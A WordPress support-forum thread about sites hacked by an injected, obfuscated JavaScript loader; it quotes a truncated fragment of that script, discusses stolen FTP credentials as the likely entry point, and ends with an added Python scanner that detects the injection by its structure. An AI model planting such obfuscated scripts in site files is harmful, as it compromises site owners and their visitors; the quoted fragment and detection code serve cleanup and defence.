2.5.1 hacked?

  • Looks like at around 8:48AM this morning, someone got into my WordPress installs (all 11 of them, in my account), and managed to add code to wp-login:

    script language=JavaScript>function hmlyban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,52,34,14,32,57,59,46,0,

    Anyone know of any vulnerabilities? My directories were changed to 715 (I think my host did that) this morning, as well.

    Anyone know what’s going on? I deleted the code, and uploaded a clean copy, and am checking the rest of my directories for stuff changed this morning, as well.

Viewing 3 replies - 1 through 3 (of 3 total)
  • They managed to hit files that weren’t 775 or 777, mostly every header, footer, and index file in every directory in every domain.

    My host has been less than responsive (ignoring chats, and hanging up on me when I call)

    Anyone have any ideas?

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    > My host has been less than responsive (ignoring chats, and hanging up on me when I call)
    >
    > Anyone have any ideas?

    Switch hosts.

    I’ve seen almost exactly the same JS code inserted into HTML and PHP files for WP and non-WP sites. We are pretty sure ours was the result of a compromised client computer with cached FTP usernames and passwords.

    For each FTP account that was compromised the function name, the string passed to it, and the numeric array were different. In our case, they inserted the script at the opening and closing body tags of any documents that contained them.
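Added example, not code from any poster in this thread: because the last reply reports that the function name, string and numeric array differed per account, a cleanup scan has to match the structure of the injected script rather than a fixed name. The signature, the `NEAR` distance and the file extensions below are assumptions derived from the fragment quoted in the first post.

```python
import re
from pathlib import Path

# Structural signature (an assumption built from the fragment quoted in the
# first post): a <script> tag that opens directly with a one-argument function
# holding a long numeric Array(...) table. The function name is wildcarded
# because it differed per compromised account.
INJECTED = re.compile(
    r"<script\b[^>]*>\s*function\s+\w+\s*\(\s*\w+\s*\)\s*\{"
    r"[^<]{0,2000}?Array\(\s*\d+(?:\s*,\s*\d+){9,}",
    re.IGNORECASE,
)
BODY_TAG = re.compile(r"</?body\b[^>]*>", re.IGNORECASE)
EXTENSIONS = {".php", ".html", ".htm"}  # assumed set of file types to check
NEAR = 80  # assumed max characters between the script and a body tag


def find_injections(text):
    """Return (offset, adjacent_to_body_tag) for each suspicious script."""
    tags = [m.span() for m in BODY_TAG.finditer(text)]
    hits = []
    for m in INJECTED.finditer(text):
        close = text.find("</script", m.end())
        end = close if close != -1 else len(text)
        # Adjacent means: just after an opening tag or just before a closing one.
        near = any(0 <= m.start() - t_end <= NEAR or 0 <= t_start - end <= NEAR
                   for t_start, t_end in tags)
        hits.append((m.start(), near))
    return hits


def scan_tree(root):
    """Walk root and return {relative_path: hits} for files with matches."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = find_injections(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


if __name__ == "__main__":
    import sys
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for offset, near in hits:
            print(f"{name}: offset {offset}, next to body tag: {near}")
```

A hit only marks a file for manual review and replacement from a clean copy; legitimate scripts with large numeric tables can match too.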
